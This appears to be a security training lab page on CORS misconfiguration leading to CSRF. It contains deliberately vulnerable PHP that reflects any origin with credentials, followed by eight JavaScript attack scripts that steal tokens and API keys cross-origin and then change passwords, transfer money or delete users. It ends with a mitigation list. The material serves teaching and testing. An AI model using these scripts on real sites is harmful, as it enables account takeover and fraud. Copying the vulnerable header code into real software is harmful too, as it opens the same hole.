Lab 5: CORS with CSRF

CORS vulnerabilities leading to CSRF attacks

Difficulty: High

Lab Overview

This lab demonstrates CORS vulnerabilities that can be leveraged to perform Cross-Site Request Forgery (CSRF) attacks. When CORS policies are misconfigured, attackers can make authenticated requests from malicious websites to perform unauthorized actions.

Objective: Exploit CORS vulnerabilities to perform CSRF attacks and unauthorized actions.

Vulnerable CORS Headers 
// Vulnerable: CORS with CSRF vulnerabilities
function set_cors_headers() {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '*';
    
    // Vulnerable: Accept any origin with credentials
    header("Access-Control-Allow-Origin: $origin");
    header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS, PATCH, HEAD");
    header("Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, X-Custom-Header, X-CSRF-Token");
    header("Access-Control-Allow-Credentials: true");
    header("Access-Control-Expose-Headers: X-Sensitive-Data, X-API-Key, X-User-Info, X-Admin-Key, X-CSRF-Token");
    header("Access-Control-Max-Age: 86400");
    
    // Handle preflight requests
    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        http_response_code(200);
        exit();
    }
}
CORS CSRF Tester
⚠️ CORS CSRF Warning

This lab demonstrates CORS with CSRF vulnerabilities:

  • Access-Control-Allow-Credentials: true - Allows credentials
  • Access-Control-Allow-Origin: $origin - Accepts any origin
  • No CSRF validation - No CSRF token validation
  • Exposed headers - Exposes sensitive headers
CSRF API Endpoints

Try these CSRF endpoints:

  • ?action=csrf_test - CSRF test data
  • ?action=user_profile - User profile data
  • ?action=admin_panel - Admin panel data
API Response
API Response (May contain sensitive data):
Click a button above to test the API
Vulnerability Details
  • Type: CORS with CSRF
  • Severity: Critical
  • Method: GET/POST
  • Issue: CORS leading to CSRF
Attack Vectors
  • CSRF Attacks: Unauthorized actions
  • Data Theft: Steal sensitive data
  • Account Takeover: Change passwords
  • Financial Fraud: Transfer money
CORS CSRF Exploitation Examples

Use these techniques to exploit CORS vulnerabilities for CSRF attacks:

1. Basic CORS CSRF Attack:
// Basic CORS CSRF attack fetch('http://vulnerable-site.com/api?action=csrf_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-Custom-Header': 'malicious-value' } }) .then(response => response.json()) .then(data => { console.log('CSRF data stolen:', data); // Extract CSRF token const csrfToken = data.csrf_token; const apiKey = data.api_key; const adminToken = data.admin_token; // Perform CSRF attack fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': csrfToken }, body: JSON.stringify({ action: 'update_profile', email: 'attacker@evil.com' }) }); });
2. Password Change CSRF:
// Password change CSRF attack fetch('http://vulnerable-site.com/api?action=user_profile', { method: 'GET', credentials: 'include', mode: 'cors' }) .then(response => response.json()) .then(data => { console.log('User profile stolen:', data); // Extract CSRF token const csrfToken = data.csrf_token; // Perform password change CSRF fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': csrfToken }, body: JSON.stringify({ action: 'change_password', new_password: 'attacker_password_123' }) }); });
3. Money Transfer CSRF:
// Money transfer CSRF attack fetch('http://vulnerable-site.com/api?action=user_profile', { method: 'GET', credentials: 'include', mode: 'cors' }) .then(response => response.json()) .then(data => { console.log('User profile stolen:', data); // Extract CSRF token const csrfToken = data.csrf_token; // Perform money transfer CSRF fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': csrfToken }, body: JSON.stringify({ action: 'transfer_money', amount: 10000, to_account: 'attacker-account-12345' }) }); });
4. Admin Action CSRF:
// Admin action CSRF attack fetch('http://vulnerable-site.com/api?action=admin_panel', { method: 'GET', credentials: 'include', mode: 'cors' }) .then(response => response.json()) .then(data => { console.log('Admin data stolen:', data); // Extract CSRF token const csrfToken = data.csrf_token; const adminToken = data.admin_token; // Perform admin action CSRF fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': csrfToken, 'Authorization': 'Bearer ' + adminToken }, body: JSON.stringify({ action: 'admin_action', command: 'delete_all_users' }) }); });
5. Account Deletion CSRF:
// Account deletion CSRF attack fetch('http://vulnerable-site.com/api?action=user_profile', { method: 'GET', credentials: 'include', mode: 'cors' }) .then(response => response.json()) .then(data => { console.log('User profile stolen:', data); // Extract CSRF token const csrfToken = data.csrf_token; // Perform account deletion CSRF fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': csrfToken }, body: JSON.stringify({ action: 'delete_account', confirm: true }) }); });
6. Advanced CORS CSRF with Headers:
// Advanced CORS CSRF with headers fetch('http://vulnerable-site.com/api?action=csrf_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-Custom-Header': 'malicious-value', 'X-Forwarded-For': '192.168.1.100', 'X-Real-IP': '192.168.1.100' } }) .then(response => { // Access exposed headers const sensitiveData = response.headers.get('X-Sensitive-Data'); const apiKey = response.headers.get('X-API-Key'); const userInfo = response.headers.get('X-User-Info'); const adminKey = response.headers.get('X-Admin-Key'); const csrfToken = response.headers.get('X-CSRF-Token'); console.log('Exposed headers:', { sensitiveData, apiKey, userInfo, adminKey, csrfToken }); return response.json(); }) .then(data => { console.log('CSRF data with headers:', data); // Perform CSRF attack with headers fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': data.csrf_token, 'X-Custom-Header': 'malicious-value' }, body: JSON.stringify({ action: 'update_profile', email: 'attacker@evil.com' }) }); });
7. Real-time CSRF Monitoring:
// Real-time CSRF monitoring setInterval(() => { fetch('http://vulnerable-site.com/api?action=csrf_test', { method: 'GET', credentials: 'include', mode: 'cors' }) .then(response => response.json()) .then(data => { console.log('Real-time CSRF data:', data); // Perform CSRF attack fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': data.csrf_token }, body: JSON.stringify({ action: 'update_profile', last_activity: new Date().toISOString() }) }); }); }, 30000); // Every 30 seconds
8. Advanced CORS CSRF Combination:
// Advanced CORS CSRF combination async function advancedCORSCSRF() { try { // First, get CSRF token and sensitive data const response = await fetch('http://vulnerable-site.com/api?action=csrf_test', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-Custom-Header': 'malicious-value' } }); const data = await response.json(); const csrfToken = data.csrf_token; const apiKey = data.api_key; const adminToken = data.admin_token; console.log('Stolen data:', data); // Perform multiple CSRF attacks const csrfAttacks = [ { action: 'update_profile', email: 'attacker@evil.com' }, { action: 'change_password', new_password: 'attacker_password_123' }, { action: 'transfer_money', amount: 10000, to_account: 'attacker-account-12345' }, { action: 'admin_action', command: 'delete_all_users' } ]; for (const attack of csrfAttacks) { try { await fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'X-CSRF-Token': csrfToken, 'Authorization': 'Bearer ' + apiKey }, body: JSON.stringify(attack) }); console.log('CSRF attack successful:', attack); } catch (error) { console.error('CSRF attack failed:', attack, error); } } } catch (error) { console.error('Advanced CORS CSRF failed:', error); } } advancedCORSCSRF();
Real-World Attack Scenarios
Mitigation Strategies
  • Implement proper CSRF token validation
  • Use specific origins instead of wildcard
  • Implement proper origin validation
  • Use whitelist-based CORS policies
  • Regular security testing and vulnerability assessments
  • Monitor for unusual cross-origin requests
  • Implement proper authentication and authorization
  • Use Content Security Policy (CSP)
  • Implement rate limiting and request validation
  • Audit exposed headers and minimize exposure
  • Use secure session management
  • Implement proper token validation
  • Use SameSite cookie attributes
  • Implement proper request validation